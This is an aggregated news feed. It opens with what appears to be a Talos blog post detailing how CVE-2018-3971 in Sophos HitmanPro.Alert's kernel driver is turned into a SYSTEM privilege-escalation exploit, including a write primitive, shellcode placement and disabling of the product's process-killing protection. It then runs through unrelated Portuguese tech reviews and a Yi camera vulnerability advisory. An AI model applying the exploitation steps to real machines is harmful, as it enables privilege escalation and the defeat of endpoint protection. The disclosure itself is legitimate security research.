Sophos HitmanPro.Alert is a threat-protection solution based on heuristic algorithms that detect and block malicious activity. Some of these algorithms need kernel-level access to gather the appropriate information they need. The software's core functionality has been implemented in the `hmpalert.sys` kernel driver by Sophos. This blog will show how an attacker could leverage TALOS-2018-0636 to build a stable exploit to gain SYSTEM rights on the local machine.


Vulnerability Overview
During our research, we found two vulnerabilities in the `hmpalert.sys` driver's IO control handler. For the purposes of this post, we will focus only on TALOS-2018-0636/CVE-2018-3971, an escalation of privilege vulnerability in Sophos HitmanPro.Alert. First, we will turn it into a reliable write-what-where vulnerability and then later into a fully working exploit.

First, we use the `OSR Device Tree` tool (Figure 1) to analyse the `hmpalert.sys` driver's access rights.

Figure 1. Device Tree application showing hmpalert device privilege settings

We can see that any user logged into the system can obtain a handler to the `hmpalert` device and send an I/O request to it. Keep in mind for building this exploit, as we mentioned in the original vulnerability blog post, the I/O handler related to this vulnerability is triggered by the IOCTL code `0x2222CC.` The vulnerable code looks similar to the one below.

Figure 2. Body of a vulnerable function
The nice thing is that we fully control the first three parameters of this function, but we do not control the source data completely (e.g. the `srcAddress` needs to point to some memory area related to the lsass.exe process) (line 12).

Additionally, data read from the lsass.exe process (line 23) is copied to the destination address the `dstAddress` parameter is pointing to (line 33).

With this basic information, we can construct the first proof of concept exploit to trigger the vulnerability:

Figure 3. Minimal proof of concept to trigger the vulnerability
This looks like it could work, but it's not enough to create a fully working exploit. We need to dig into the `inLsassRegions` function and see how exactly the `srcAddress` parameter is tested. We have to check if we will be able to predict this memory content and turn our limited `arbitrary write` access into a fully working `write-what-where` vulnerability.

Controlling the source
We need to dive into the `inLsassRegions` function to get more information about the `srcAddress` parameter:

Figure 4. The function responsible for checking if the `srcAddress` variable fits in one of the defined memory regions.We can see that there is an iteration over the `memoryRegionsList` list elements, which are represented by the `memRegion` structure. The `memRegion` structure is quite simple — it contains a field pointing to the beginning of the region and a second field that's the size of the region. The `srcAddress` value needs to fit into one of the `memoryRegionsList` elements boundaries. If this is the case, the function returns 'true' and the data is copied.

The function will return 'true' even if only the `srcAddress` value fits between the boundaries (line 21). If the `srcSize` value is larger than an available region space, the `srcSize` variable is updated with the available size line 26. The question is: What do these memory regions represent, exactly? The `initMemoryRegionList` function will give us an idea.

Figure 5. Initialization of memory regions list.We can see that the context of a current thread is switched to the `lsass.exe` process address space and then the `createLsaRegionList` function is called:

Figure 6. Various memory elements of the lsass.exe processes are added to the memory regions list.
Now we can see that the memory regions list is filled with elements from the `lsass.exe` PEB structure. There are ImageBase addresses regarding loaded and mapped DLLs added to the list, including the SizeOfImage (line 31), along with other information. Unfortunately, the `Lsass.exe` process is running as a service. This means with normal user access rights, we won't be able to read its PEB structure, but we can leverage the knowledge about the mapped DLLs in the exploit in the following way: System DLLs like `ntdll.dll` are mapped into each process under the same address, so we can copy bytes from the `lsass.exe` process memory region from these system DLLs into the memory location pointed to by the `dstAddress` parameter. With that in mind, we can start creating our exploit.

Exploitation
This is not a typical `write-what-where` vulnerability like you see in the common exploitation training class, but nevertheless, we don't need to be too creative to exploit it. The presented exploitation process is based on the research presented by Morten Schenk during his presentation at the BlackHat USA 2017 conference. It also includes modifications from Mateusz "j00ru" Jurczyk, which he included in his paper "Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)." With a few changes, we can use j00ru`s code, WCTF_2018_searchme_exploit.cpp, as a template for our exploit. These changes include:
  1. Removing entire codes related to pool feng-shui.
  2. Writing a class for memory operations using the found primitives in the hmpalert.sys driver.
  3. Updating the important exploit offsets based on the ntoskrnl.exe and the win32kbase.sys versions.
Then, we will be able to use the mentioned strategy from Morten and Mateusz:
  1. Leak addresses of certain kernel modules using the NtQuerySystemInformation API — We assume that our user operates at the `Medium IL` level.
  2. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of `nt!ExAllocatePoolWithTag.`
  3. Call the `NtGdiDdDDIGetContextSchedulingPriority`(`=ExAllocatePoolWithTag`) with the `NonPagedPool` parameter to allocate writable/executable memory.
  4. Write the ring-0 shellcode to the allocated memory buffer.
  5. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of the shellcode.
  6. Call the `NtGdiDdDDIGetContextSchedulingPriority`(`= shellcode`).
  1. The shellcode will escalate our privileges to SYSTEM access rights after copying a security TOKEN from the system process to our process.
Test environment
Tested on Windows: Build 17134.rs4_release.180410-1804 x64 Windows 10

Vulnerable product: Sophos HitmanAlert.Pro 3.7.8 build 750

Memory operation primitives
To simplify memory operations, we wrote a class using the found memory operation primitives in the hmpalert.sys driver.

Figure 7. The memory class implementation
The core `copy_mem` method is implemented like this:

Figure 8. The Memory::copy_mem method implementation

We initialize a couple of important elements inside the class constructor:

Figure 9. The memory class constructor implementation
We can use the `write_mem` method to write a certain value to a specific address:

Figure 10. The memory class write_mem method implementationWe can not directly copy bytes defined in the `data` argument. Therefore, we need to search for each byte from the `data` argument in the `ntdll.dll` mapped image and then pass the address of the byte to the hmpalert driver via the `srcAddress` parameter. That way, byte by byte, will overwrite the data at the destination address `dstAddress` with bytes defined in the `data` argument. We can easily overwrite necessary kernel pointers and copy our shellcode to the allocated page by using this class:


Figure 11. Shellcode copy operation to an allocated page.
The rest of the exploit is straightforward, so we can leave the implementation as a task for the interested reader.

Fail — Zero-day protection really works!
Armed with a fully working exploit, we are ready to test it. If it works, we should get SYSTEM level privileges.

Figure 12. The elevated console is detected and terminated by the HitmanPro.Alert.It looks like our exploit has been detected by the `HitmanAlert.Pro's` anti-zero-day detection engine. Looking at the exploit log, it seems that its entire code was executed, but the spawned elevated console has been terminated.

Figure 13. At the end of the exploit, the console with elevated rights is executed.
We can see in the system event log that HitmanAlert.Pro logged an exploitation attempt and classified it as a local privilege escalation:


Figure 13. Event log showing that it was logged by HitmanAlert.Pro as an attempted privilege escalation.Using a zero-day to bypass anti-zero-day detection
We know that our exploit works correctly, but the problem is that it's terminated by the anti-exploitation engine during an attempt to spawn the elevated shell.

We can look at HitmanAlert.Pro's engine to find out where this function is implemented. The Microsoft Windows API provides the `PsSetCreateProcessNotifyRoutine,` which can be used to monitor process creation in the OS. Searching for this API call in the `hmpalert.sys` driver, IDA shows a couple of calls.

Figure 14. Registration of `ProcessNotifyRoutine` via `PsSetCreateProcessNotifyRoutine` API.We do see some places where it registers the callback routine. Let's look into the implementation of the `ProcessNotifyRoutine`. While stepping through it, we found the following code:

Figure 15. An implementation of `ProcessesKiller` function, responsible for the termination of potentially malicious processes.At line 44, you can see a call to the routine that's responsible for killing "dangerous/malicious" processes. As we can see at line 5, there is a condition checking whether a global variable `dword_FFFFF807A4FA0FA4` is set. If it is not set, the rest of the function code will not be executed. All we need to do is to overwrite the value of this global variable with a value of zero to avoid termination of our elevated console. The final portion of the exploit looks like this:

Figure 16. Overwriting a global variable in the `hmpalert.sys` driver to trick the `ProcessesKiller` function, allowing our spawned elevated console to execute.
Time to test our exploit in action.

Final exploit - LPE Windows 10 x64 / SMEP bypass
VIDEO



Summary
Due to the many anti-exploitation features in today's operating systems, weaponizing vulnerabilities can often be arduous, but this particular vulnerability shows that we can still use some Windows kernel-level flaws to easily exploit bugs in modern Windows systems. This deep dive showed how an attacker could take a vulnerability and weaponize it into a stable, usable exploit. Talos will continue to discover and responsibly disclose vulnerabilities on a regular basis and provide additional deep-dive analysis when necessary. Check out or original disclosure here to find out how you can keep your system protected from this vulnerability.


Castlevania Requiem: Symphony of the Night and Rondo of Blood — Review

MeioBit - Thu, 01/11/2018 - 11:06

Poucas empresas possuem um catálogo tão respeitável quanto a Konami e entre os muitos clássicos que ela lançou ao longo dos anos, vários pertence à franquia Castlevania. Sabendo o enorme apelo que ela ainda possui e querendo aproveitar o lançamento da segunda temporada da série produzida pela Netflix, a empresa japonesa decidiu explorar dois títulos que marcaram época e assim chegou ao PlayStation 4 o Castlevania Requiem: Symphony of the Night and Rondo of Blood.

Com as histórias dos dois jogos estando diretamente conectadas, no Rondo of Blood acompanharemos Richter Belmont em uma aventura para resgatar a sua amada Annette das garras do Conde Dracula, enquanto no Symphony of the Night assumiremos o papel de Alucard, filho do vampiro cujo objetivo também será destruí-lo.

Entre os dois o Symphony of the Night sem dúvida é o mais conhecido, mesmo porque o seu antecessor apareceu originalmente apenas no PC Engine — a versão japonesa do console que por aqui ficou conhecido como TurboGrafx-16. Mesmo com o jogo tendo sido refeito depois para o Super Nintendo e aparecido como Castlevania: Dracula X, existia muitas diferenças entre as versões, como a direção artística, a falta de cenas não-interativas e mesmo na construção dos estágios.

No caso do Rondo of Blood o que poderá assustar os jogadores mais novos ou que não jogam um Castlevania mais tradicional há muito tempo é o seu alto nível de dificuldade. Com os inimigos nos causando muito dano e sem uma fartura de itens para recuperar a nossa energia, morrer será uma constante e como ele segue o estilo mais linear dos jogos mais antigos da série, é bom se preparar para ter que refazer um mesmo trecho diversas vezes.

O Symphony of the Night por sua vez é um esplendor quando se trata da jogabilidade. Ao adotar elementos de exploração e RPGs, o título conseguiu se transformar num divisor de águas para a franquia, sendo desafiador de uma maneira diferente e mostrando-se extremamente viciante. Tentar descobrir cada segredo do castelo do Dracula continua sendo algo muito divertido, especialmente se quisermos conhecer a sua versão invertida e encontrar tudo o que o jogo tem a oferecer.

Uma adaptação correta, mas preguiçosa

Baseado no Castlevania: The Dracula X Chronicles que foi lançado para o PSP em 2007, a escolha da Konami resultou em mais pontos fracos do que fortes. Para começar, o Symphony of the Night conta com uma localização bem diferente do que temos no original lançado para o PlayStation ou mesmo na versão que apareceu no Xbox 360 naquele mesmo ano. Isso significa uma dublagem mais profissional, mas também algumas mudanças no texto. Lembra do célebre diálogo logo no início em que o Dracula fala “What is a man? A miserable little pile of secrets”? Pois ele não estará presente aqui.

Além disso, essa coletânea para o PlayStation 4 infelizmente não traz o remake 2.5D do Rondo of Blood e embora eu prefira os gráficos originais, seria muito bom ter esta versão, nem que ela tivesse que ser desbloqueada após realizarmos alguns passos.

Isso no entanto não significa que os jogos não contem com novidades, mas é preciso reconhecer que elas são muito pequenas. Um exemplo é a saída de som pelo controle quando pegamos itens ou mesmo a função do gamepad vibrar de acordo com o que estiver acontecendo na tela. Tais recursos ajudam a melhorar a experiência, mas não dá para dizer que são grandes diferenciais.

A Konami ainda tratou de garantir que ambos os jogos rodassem numa resolução de até 4K, mas estamos falando de gráficos em pixels e particularmente não consegui ver diferença no Symphony of the Night rodando no PlayStation 4 ou no Xbox 360. Some a isso a possibilidade de escolhermos a moldura da tela, de adicionarmos filtros para imitar uma TV CRT ou deixar os pixels “mais bonitos” e no fim das contas, o destaque vai mesmo para a opção de jogarmos com dublagem em inglês ou japonês, assim como os troféus.

Cadê o museu, Konami?

No entanto, o que realmente senti falta no Castlevania Requiem: Symphony of the Night and Rondo of Blood foi de um modo museu. Ao contrário do que a Capcom tem feito nas suas coletâneas, a Konami não se deu ao trabalho de incluir algumas informações para os fãs, como uma galeria de artes conceituais, informações sobre as produções, entrevistas com os desenvolvedores ou mesmo um lugar para ouvirmos as músicas dos jogos — o que no caso de trilhas sonoros com tanta qualidade, é quase um crime.

Como grande fã da franquia, seria muito legar poder conhecer detalhes sobre como esses dois ótimos jogos foram feitos, poder relembrar comerciais ou ver alguns dos profissionais envolvidos nas suas criações falando sobre dificuldades e escolhas que foram feitas. Eu sei que muitas pessoas não se importam com esse tipo de material adicional, mas acredito que ele serviria para mostrar que houve um cuidado maior com o desenvolvimento do pacote, mas pelo jeito não é assim que o pessoal da Konami pensa.

A exagerada confiança no saudosismo

Mesmo não restando dúvidas de que a Konami poderia ter se empenhado mais ao criar o Castlevania Requiem: Symphony of the Night and Rondo of Blood, os jogos que esta coletânea trazem são tão espetaculares, que conseguem ofuscar qualquer problema que ela tenha. Talvez a empresa tenha se escorado justamente nisso e na paixão dos fãs para economizar na produção, o que de forma alguma pode ser comemorado, mas a verdade é que tanto o Symphony of the Night quanto o Rondo of Blood são tão bons e envelheceram tão bem, que fica difícil não recomendar o pacote.

A torcida agora é para que a detentora da marca pegue gosto pela coisa e relance vários outros Castlevania, em especial aqueles que ficaram exclusivos para os portáteis. No entanto, seria bom se a empresa se esforçasse um pouco mais e nos entregasse algo  além de “apenas” boas adaptações, pois o saudosismo dos fãs certamente merece muito mais.

O Meio Bit analisou o Castlevania Requiem: Symphony of the Night and Rondo of Blood no PlayStation 4, com uma cópia digital cedida pela Konami.

O post Castlevania Requiem: Symphony of the Night and Rondo of Blood — Review apareceu primeiro em Meio Bit.

WhatsApp confirma a introdução de anúncios na aba Status

MeioBit - Thu, 01/11/2018 - 10:30

O WhatsApp finalmente vai fazer uma graninha com seus usuários: segundo o vice-presidente Chris Daniels, o mensageiro instantâneo vai em breve passar a exibir anúncios, intercalando-os entre as publicações de seus contatos na aba Status. A novidade, no entanto ainda não tem data para entrar no ar.

A forma que o WhatsApp escolheu para entregar os informes publicitários não poderia ser outra, aliás: assim como já ocorre no Instagram e Facebook, o Status é a versão do aplicativo para os Stories, as publicações de fotos e vídeos que sobrevivem por apenas 24 horas, que a companhia de Mark Zuckerberg copiou do Snapchat após não conseguir comprar a empresa rival. Hoje o WhatsApp Status conta com 450 milhões de usuários diários, sendo assim monetiza-lo era inevitável.

Antes do Facebook comprar o WhatApp em 2014, a startup se gabava de nunca exibir anúncios aos usuários e para manter seus serviços, cobrava uma “taxa simbólica” de apenas US$ 1 ao ano, ainda que a maioria esmagadora dos usuários jamais tenha desembolsado um tostão.

Quando Zuck desembolsou US$ 19 bilhões para comprar o WhatsApp, a cobrança foi revogada e uma das promessas feitas na ocasião foi de manter o app livre de anúncios, mas sem uma fonte de renda, isso não durou: os fundadores  Jan Koum e Brian Acton resistiram por anos à introdução de anúncios na plataforma e o compartilhamento de seus dados com outros produtos da empresa, mas com a adoção da aba Status e a consequente imposição da visão do Facebook, ambos se tornaram votos vencidos e saíram da companhia. Hoje Acton se diz “um vendido” por ter traído a confiança dos usuários, o que o levou a inclusive abrir mão de US$ 850 milhões em ações ao pular fora do barco.

Segundo Daniels, as mudanças a serem feitas para a inclusão dos anúncios não prejudicarão a privacidade dos usuários do WhatsApp, com a criptografia ponta a ponta não sendo afetada; dessa forma, o Facebook permanece sendo incapaz de analisar o conteúdo das mensagens compartilhadas, e assim terá que depender de outros métodos para saber o que seus consumidores compartilham dentro da plataforma.

O executivo não esclareceu quando o WhatsApp passará a exibir os anúncios, mas isso não deve demorar: referências à funcionalidade já foram encontradas no código de versões beta do Android, indicando que os informes publicitários deverão ser habilitados em uma atualização próxima.

Com informações: The Economic Times.

O post WhatsApp confirma a introdução de anúncios na aba Status apareceu primeiro em Meio Bit.

Vulnerability Spotlight: Multiple Vulnerabilities in Yi Technology Home Camera

Talos - Wed, 31/10/2018 - 18:18
Vulnerabilities Discovered by Lilith [x_x] of Cisco Talos.

Overview

Cisco Talos is disclosing multiple vulnerabilities in the firmware of the Yi Technology Home Camera. In order to prevent the exploitation of these vulnerabilities, Talos worked with Yi Technology to make sure a newer version of the firmware is available to users. These vulnerabilities could allow an attacker to gain remote code execution on the devices via a command injection, bypass methods of network authentication, or disable the device.

The Yi Home Camera is an internet-of-things (IoT) home camera sold globally. The 27US version is one of the newer models sold in the U.S. and is the most basic model out of the Yi Technology camera lineup.

It includes all the functions that one would expect from an IoT device, including the ability to view the camera's feed from anywhere, offline storage, subscription-based cloud storage and easy setup.

There are many consequences to a security vulnerability within the firmware of this security camera. An attacker could exploit these vulnerabilities to:

  • Disable the camera to prevent it from recording.
  • Delete stored videos on the camera.
  • View video feeds from the camera.
  • Potentially launch attacks against the camera owner's phone app.
  • Act as a foothold into the home network to attack other devices inside.


This list is not complete, and many other consequences could occur, so Talos highly recommends that the devices are patched as soon as possible via the Yi Home application.

Exploitation

Due to the nature of IoT devices, more attack surfaces are available on a given device than a typical server or client program. For half of the vulnerabilities, physical access is required to exploit them, which obviously makes them less of a concern if the camera is stored safely inside of the venue that they are protecting, but for the other five vulnerabilities, there is a network attack vector, raising their severity and the importance of getting the latest firmware.

Before summarizing these network-based vulnerabilities, it is important to note that they are all made possible by TALOS-2018-0616, as all of these vulnerabilities are over cleartext protocols, either unencrypted UDP or HTTP. If the slight performance hit was taken to implement the core network functionality over HTTPS, these vulnerabilities would either not have been as severe, or not have been exploitable at all.

Denial of service:

TALOS-2018-0602 and TALOS-2018-0595 were both found within the p2p_tnp binary, which is the main controller for phone-to-camera and cloud-to-camera communication. That binary also implements a custom UDP peer-to-peer (p2p) protocol for all of the aforementioned features. In both vulnerabilities, some seemingly artifact opcodes could be accessed without authentication, which would allow an attacker to either permanently disable the video feed or cause unlimited memory to be allocated, both rendering the camera useless.

Remote Code Execution:

TALOS-2018-0567 is easily the most severe vulnerability out of the batch, requiring only the ability to respond to an HTTP request from the camera in order to hit a command injection and subsequent code execution. The vulnerable time_sync request happens extremely often as soon as the device connects to the network.

Administrative Access:

The last of the network-based vulnerabilities, TALOS-2018-0601 allows an attacker to reuse tokens that can be sniffed over the wire via TALOS-2018-0616 so that one sniffed token can be used an unlimited number of times by an attacker to access the p2p_tnp API that is normally reserved for the camera's owner via the Yi Home phone application. This access only lasts until the device reboots, at which point another token needs to be sniffed.

Physical and Local Attack Vectors:

As noted above, IoT devices tend to lend themselves to vulnerabilities with more unusual attack vectors, and the Yi Home Camera is no exception. Vulnerabilities were found via the firmware update functionality (TALOS-2018-0565, TALOS-2018-0584 and TALOS-2018-0566), the SSID that the camera connects to for wireless access (TALOS-2018-0580) and via the QR code that is used when setting up the device out of the box (TALOS-2018-0572 and TALOS-2018-0571). Because of this, it is suggested that these devices are not kept in areas where they are physically available to others, and once again, that the devices' firmware is updated as soon as possible.

Vulnerability Summaries

TALOS-2018-0565 -- Yi Technology Home Camera 27US Firmware Update Code Execution Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted file can cause a logic flaw and command injection, resulting in code execution. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0566 / CVE-2018-3891 - Yi Technology Home Camera 27US Firmware Downgrade Vulnerability

An exploitable firmware downgrade vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted file can cause a logic flaw, resulting in a firmware downgrade. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0567 -- Yi Technology Home Camera 27US TimeSync Code Execution Vulnerability

An exploitable firmware downgrade vulnerability exists in the time syncing functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted packet can cause a buffer overflow, resulting in code execution. An attacker can intercept and alter network traffic to trigger this vulnerability.

TALOS-2018-0571 / CVE-2018-3898-CVE-2018-3899 - Yi Technology Home Camera 27US QR Code trans_info Code Execution Vulnerability

An exploitable code execution vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially QR Code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0572 / CVE-2018-3900 - Yi Technology Home Camera 27US QR Code Base64 Code Execution Vulnerability

An exploitable firmware downgrade vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially QR code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0580 / CVE-2018-3910 - Yi Technology Home Camera 27US cloudAPI SSID Code Execution Vulnerability

An exploitable code execution vulnerability exists in the cloud OTA setup functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted SSID can cause a command injection, resulting in code execution. An attacker can cause a camera to connect to this SSID to trigger this vulnerability. Alternatively, an attacker can convince a user to connect their camera to this SSID.

TALOS-2018-0595 / CVE-2018-3928 - Yi Technology Home Camera 27US Notice_To Denial Of Service Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause the settings to change, resulting in a denial of service. An attacker can send a set of packets to trigger this vulnerability.

TALOS-2018-0601 / CVE-2018-3934 - Yi Technology Home Camera 27US Nonce Reuse Authentication Bypass Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause a logic flaw, resulting in an authentication bypass. An attacker can sniff network traffic and send a set of packets to trigger this vulnerability.

TALOS-2018-0616 / CVE-2018-3947 - Yi Technology Home Camera 27US p2p_tnp Cleartext Data Transmission Vulnerability

An exploitable information disclosure vulnerability exists in the phone-to-camera communications of Yi Home Camera 27US 1.8.7.0D. An attacker can sniff network traffic and trigger this vulnerability.

TALOS-2018-0602 / CVE-2018-3935 - Yi Technology Home Camera 27US CRCDec Denial Of Service Vulnerability

An exploitable code execution vulnerability exists in the UDP network functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can allocate unlimited memory, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability.

Versions Tested

The Yi Technology Home Camera 27US 1.8.7.0D version of the firmware was used during the discovery of the vulnerabilities listed above.



Firmware at Yi Technology 


Conclusion

With the increased convenience of IoT devices, a new set of attack vectors arose that have not been as hardened as traditional ones. As such, Talos recommends that users apply these newly available firmware updates in order to ensure their continued and secure operation. This can be done via the Yi Home phone app, which will notify the user of this new firmware upon being opened. It is also recommended that the user checks the device's firmware version after the update, via the phone app, in order to ensure that the update did in fact occur.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules:
46190-46191. 46294-46295. 46780. 46870.

For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal here.

To review our Vulnerability Disclosure Policy, please visit this site here.

Resenha — Tello, o pequeno notável drone da Ryze Tech (com tecnologia DJI)

MeioBit - Wed, 31/10/2018 - 16:00

Nos últimos meses, nós nos divertimos muito aqui na redação do MB com o Tello, que apesar de ser bem compacto, é um drone duro na queda, que é um ótimo aparelho para quem nunca teve um drone e quer aprender a pilotar um pra se aventurar por aí. Com seu tamanho e peso de somente 80 gramas, o Tello consegue ser bem rápido, atingindo uma velocidade máxima de 28,8 km. Sua bateria tem autonomia para até 13 minutos de voo, dependendo é claro das manobras realizadas, que podem reduzir esse tempo.

Por ser tão leve, o Tello é capaz de manobras inacreditáveis, que deixam todo mundo impressionado, sendo um companheiro perfeito para animar qualquer festa, tirando fotos e gravando vídeos bem legais, que podem mostrar ângulos diferentes e inusitados.

Não se trata de um brinquedo, ele é bem mais do que isso, e embora esteja longe de produzir imagens profissionais com suas fotos de 5 megapixels e vídeos em 720p, ele conta com estabilização eletrônica de imagens, que garantem uma boa qualidade pelo que ele custa. O Tello não tem memória interna ou cartão microSD, assim todos as fotos e os vídeos são transmitidos ao vivo em HD e gravados no smartphone.

Apesar do hardware em si ser feito pela Ryze Tech, o Tello é uma união de esforços, pois é equipado com processador Intel e conta com tecnologia de voo com recursos de inteligência artificial desenvolvida pelos mestres no assunto, a DJI. Infelizmente todas as fotos que fiz dele e do controle não ficaram tão boas, então neste post vou usar as imagens de divulgação dos produtos.

O aparelho que testamos veio em um kit (muito bem) acompanhado pelo controle GameSir T1d, que pode ser sincronizado de forma simples e rápida através de uma conexão Bluetooth, para ser usado com o smartphone como tela. Controlar o Tello com o T1d é uma ótima pedida, pois fica muito mais fácil pilotar o drone pelos joysticks do nos botões virtuais da tela, assim a curva de aprendizado de voo certamente será muito mais rápida.

O curioso é que o Tello não tem GPS, e sim um sistema de posicionamento feito pela sua câmera e os sensores na parte de baixo, e que funciona surpreendentemente bem. O pequeno drone se posiciona de forma bem eficaz desta forma, especialmente dentro de casa.

O Tello brilha mesmo nos seus modos automáticos, como o que permite que você faça ele decolar da sua mão, deixando as hélices girando lentamente enquanto espera que você o arremesse. Nas festas ou reuniões, algo que também faz bastante sucesso é que além de decolar, ele pode pousar tranquilamente na mão do seu piloto.

Dito isto, é bom não ir esperando recursos de drones mais avançados, como o utilíssimo botão de voltar pra casa. Caso o Tello perca o sinal e a conexão com o smartphone, ele vai pousar onde estiver, então todo cuidado é pouco com a escolha dos lugares onde for voar com ele, sendo que pilotar em cima d’água definitivamente não é recomendável, já que vai confundir os sensores do pequeno e valente drone.

O modo 8D Flips é o mais divertido para festas, e também vai fazer a alegria das crianças, pois faz o drone fazer viradas em 360 graus, dependendo da direção em que você desenhe na tela. Todas as manobras podem ser feitas em casa, e ele já vem com os protetores das hélices montados.

Um dos problemas do aparelho é sua câmera fixa, sempre apontada para a frente, o que realmente é uma pena. Seria bem legal se a câmera fosse voltada para baixo, mas ela não fica para frente à toa, é uma necessidade para o posicionamento do aparelho, além de tirar fotos e gravar vídeos das pessoas (desde que não esteja muito alto).

Em último caso, você pode fazer como um cara que eu vi no YouTube, que imprimiu um adaptador em 3D e colocou um pequeno espelho, pra assim deixar a câmera do Tello voltada para baixo. É algo bem simples, mas que tem o potencial de deixar as fotos e vídeos feitos com o Tello muito mais interessantes, se bem que isso pode prejudicar o sistema de navegação do drone, e até mesmo desestabilizar seu voo, então melhor se conformar com o ângulo frontal das imagens da câmera mesmo.

O aplicativo Tello está disponível na App Store e no Google Play. Outra coisa interessante do Tello é a função Scratch, que foi desenvolvida pelo MIT e permite que os usuários (crianças inclusive) possam programar padrões de voos e sequências de manobras.

O kit que testamos já veio com duas baterias, mas a DJI vende baterias extras e até mesmo um hub para carregar 3 baterias do Tello ao mesmo tempo. Ele também tem capas especiais que dão mais personalidade ao drone, e também podem oferecer uma maior proteção contra água, se bem que voar com o Tello em um dia de chuva é a última coisa que eu recomendo.

Para quem quer começar a usar um drone mas fica inseguro se vai conseguir pilotar de forma aceitável, o Tello pode servir como uma ótima escola, e é exatamente assim que é posicionado e vendido pela DJI no Brasil e lá fora.

O Tello foi criado para ser usado em ambientes fechados, do lado de fora ele também funciona bem em dias normais, só não recomendo voar com o Tello naqueles dias em que o vento estiver mais forte, pois ele pode realmente ir embora com a ventania. Como o seu alcance é de 100 metros, ele não vai muito longe, a não ser que seja mesmo carregado pelo vento.

Se eu recomendo o Tello? Olha, pelo seu preço, recomendo sim, e muito. O aparelho é pequeno, leve e portátil, e conta com vários recursos de inteligência artificial, sem falar no detalhe muito divertido de ser um drone capaz de decolar e pousar diretamente da sua mão. O Tello é perfeito pra quem procura um drone bem barato pra se acostumar com os voos, antes de investir em drones mais poderosos e muito mais caros.

No Brasil, o Tello é vendido oficialmente por R$ 549 pela DJI Store do BarraShopping, Rio de Janeiro, e em várias lojas online. Lá fora, ele custa US$ 99 na loja online da DJI.

Estou terminando de editar um vídeo do Tello lá no meu canal, e assim que estiver pronto, postarei aqui. Também estou testando o Mavic 2 Zoom da DJI, podem aguardar uma resenha muito em breve.

Leia também aqui no MB o meu review sobre o Mavic Air.

O post Resenha — Tello, o pequeno notável drone da Ryze Tech (com tecnologia DJI) apareceu primeiro em Meio Bit.

Indo além do Spotify, novo Waze Audio Player será compatível com Deezer, Pandora e outros

MeioBit - Wed, 31/10/2018 - 14:02

Até agora, só usuários do Spotify tinham o privilégio de ter um player de áudio totalmente integrado dentro do Waze, no qual o conteúdo tocado diminui de volume toda vez que o app for dar algum alerta ou alguma direção ao usuário. Agora o Waze resolveu democratizar a questão, e dar muitas outras opções aos motoristas que gostam de ouvir música, lançando um novo player de áudio compatível com vários serviços.

O novo player de áudio integrado do Waze é compatível com os serviços Deezer, Pandora, iHeartRadio, NPR, Scribd, Stitcher e TuneIn (além do já citado Spotify), para que os motoristas possam escutar suas músicas favoritas sem errarem o caminho, ou irem parar em um engarrafamento por terem pego o caminho mais longo. Estou falando de músicas ou estações de rádio digital, mas é claro que o Waze Audio Player também pode (e deve) ser usado para ouvir podcasts, estejam eles hospedados no Spotify ou na NPR.

Assim como acontece com o player do Spotify que pode ser usado no Waze hoje em dia, o usuário vai poder poder controlar tudo através de um mini player dentro do app, é só selecionar o serviço de sua preferência e sair escutando. Nem tudo são flores no novo app, e nem todos os serviços estão disponíveis para Android e iOS, o Deezer por exemplo só vai funciona na versão para iPhones, enquanto alguns outros só vão rodar no Waze para Android, pelo menos por enquanto.

O novo player foi criado com o Waze Audio Kit, um SDK feito para que desenvolvedores possam integrar seus apps de áudio com o Waze, e que está aberto para inscrição de empresas através deste link. De acordo com o Tech Crunch, uma versão beta do app com o Waze Audio Player foi distribuída esta semana para quem está inscrito no programa de testes do Waze.

O Mashable testou o novo app e disse que ele tem suporte as playlists do Spotify, mas fui abrir aqui meu Waze pra dar uma olhada, e as playlists já funcionam normalmente no player do Spotify dentro da versão atual. Na verdade, o Waze Audio Player nada mais é do que praticamente a mesma funcionalidade que o Spotify já tinha no app, mas agora aberto a outros serviços.

Se você usa o Waze e algum destes serviços, é só fazer o seu pré-registro neste site para ser avisado quando a versão do app com o novo player de áudio for lançada, o que deve acontecer no dia 14 do mês que vem. Saiba mais sobre o novo player de áudio no blog oficial do Waze.

Leia também aqui no MB outros posts meus sobre o Waze ao longo dos anos:
Uri Levine e a trajetória do Waze: dicas para criar uma startup de sucesso
Google confirma compra do Waze por mais de 1 bilhão de dólares
Google Maps para iOS e Android agora com relatórios de trânsito em tempo real do Waze

O post Indo além do Spotify, novo Waze Audio Player será compatível com Deezer, Pandora e outros apareceu primeiro em Meio Bit.

Anatomy of a sextortion scam

Talos - Wed, 31/10/2018 - 12:31
This blog was written by Jaeson Schultz.

